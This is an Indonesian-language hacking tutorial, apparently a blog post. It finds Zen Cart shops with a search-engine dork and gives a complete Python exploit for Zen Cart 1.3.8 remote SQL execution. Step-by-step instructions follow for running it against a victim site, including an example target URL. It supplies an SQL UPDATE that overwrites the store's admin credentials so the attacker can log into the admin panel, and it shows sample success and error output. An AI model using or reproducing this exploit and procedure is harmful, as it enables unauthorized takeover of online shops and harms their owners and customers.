assalamualaikum

Langsung Aja Dibaca

buka google ketik : powered by zen cart ™

kalo udah nih ada pithon :

#!/usr/bin/python

#
# ------- Zen Cart 1.3.8 Remote SQL Execution
# http://www.zen-cart.com/
# Zen Cart Ecommerce - putting the dream of server rooting within reach of anyone!
# A new version (1.3.8a) is avaible on http://www.zen-cart.com/
#
# BlackH :)
#

#
# Notes: must have admin/sqlpatch.php enabled
#
# clean the database :
#   DELETE FROM `record_company_info` WHERE `record_company_id` = (SELECT `record_company_id` FROM `record_company` WHERE `record_company_image` = '8d317.php' LIMIT 1);
#   DELETE FROM `record_company` WHERE `record_company_image` = '8d317.php';

import urllib, urllib2, re, sys

a,b = sys.argv,0

def option(name, need = 0):
   global a, b
   for param in sys.argv:
      if(param == '-'+name): return str(sys.argv[b+1])
      b = b + 1
   if(need):
      print '\n#error', "-"+name, 'parameter required'
      exit(1)

if (len(sys.argv) < 2):
   print """
=____________ Zen Cart 1.3.8 Remote SQL Execution Exploit  ____________=
========================================================================
|                  BlackH <Bl4ck.H@gmail.com>                          |
========================================================================
|                                                                      |
| $system> python """+sys.argv[0]+""" -url <url>                                |
| Param: <url>      ex: http://victim.com/site (no slash)              |
|                                                                      |
| Note: blind "injection"                                              |
========================================================================
   """
   exit(1)

url, trick = option('url', 1), "/password_forgotten.php"

while True:
   cmd = raw_input('sql@jah$ ')
   if (cmd == "exit"): exit(1)
   req = urllib2.Request(url+"/admin/sqlpatch.php"+trick+"?action=execute", urllib.urlencode({'query_string' : cmd}))
   if (re.findall('1 statements processed',urllib2.urlopen(req).read())):
      print '>> success (', cmd, ")"
   else:
      print '>> failed, be sure to end with ; (', cmd, ")"

tuh pithon save dgn extensi zen.py

sebelum nya komputer kamu instal dlu pithon nya , kalo blum aja download aja di : http://www.python.org/ftp/python/2.5/python-2.5.msi

kalo udah buka cmd
misal zen.py kamu taruh di desktop bearti cmd kamu arahin ke desktop dlu

kalo udah ketik : zen.py -url htttp://webkorban.com
contohh : zen.py -url http://customizthat.com/2010/admin/ <–enter
trus nanti ada tulisan $sql@jah
aklo ada tulisan itu bearti masukin perintah : UPDATE admin SET admin_name=’adminz’, admin_email=’admin@shopadmin.com’, admin_pass=’617ec22fbb8f201c366e9848c0eb6925:87′ WHERE admin_id=’1′; trus enter

kalo berhasil maka akan muncul kayak ini :

>> success ( UPDATE admin SET admin_name='adminz', admin_email='admin@shopadmin.
com', admin_pass='617ec22fbb8f201c366e9848c0eb6925:87' WHERE admin_id='1'; )
sql@jah$

contoh nya nih ss nya

Bugs Zen Cart

Bugs Zen Cart

kalo udah succes, tinggal di url target ditambahin /admin/

kalo succes setiap username sama pasword nya itu adminz : wew

sekian dan terima kasih

Kalo berhasil ada tulisan ini

>> success ( UPDATE admin SET admin_name='adminz', admin_email='admin@shopadmin.
com', admin_pass='617ec22fbb8f201c366e9848c0eb6925:87' WHERE admin_id='1'; )
sql@jah$

Kalo gagal ada tulisan gini

>> failed, be sure to end with ; ( UPDATE admin SET admin_name='adminz', admin_e
mail='admin@shopadmin.com', admin_pass='617ec22fbb8f201c366e9848c0eb6925:87' WHE
RE admin_id='1';

Atau ini

Traceback (most recent call last):
 File "C:\Documents and Settings\Toshiba\Desktop\zen.py", line 53, in
 if (re.findall('1 statements processed',urllib2.urlopen(req).read())):
 File "C:\Python25\lib\urllib2.py", line 121, in urlopen
 return _opener.open(url, data)
 File "C:\Python25\lib\urllib2.py", line 374, in open
 response = self._open(req, data)
 File "C:\Python25\lib\urllib2.py", line 392, in _open
 '_open', req)
 File "C:\Python25\lib\urllib2.py", line 353, in _call_chain
 result = func(*args)
 File "C:\Python25\lib\urllib2.py", line 1101, in http_open
 return self.do_open(httplib.HTTPConnection, req)
 File "C:\Python25\lib\urllib2.py", line 1076, in do_open
 raise URLError(err)
urllib2.URLError: 

By : Ichito Bandito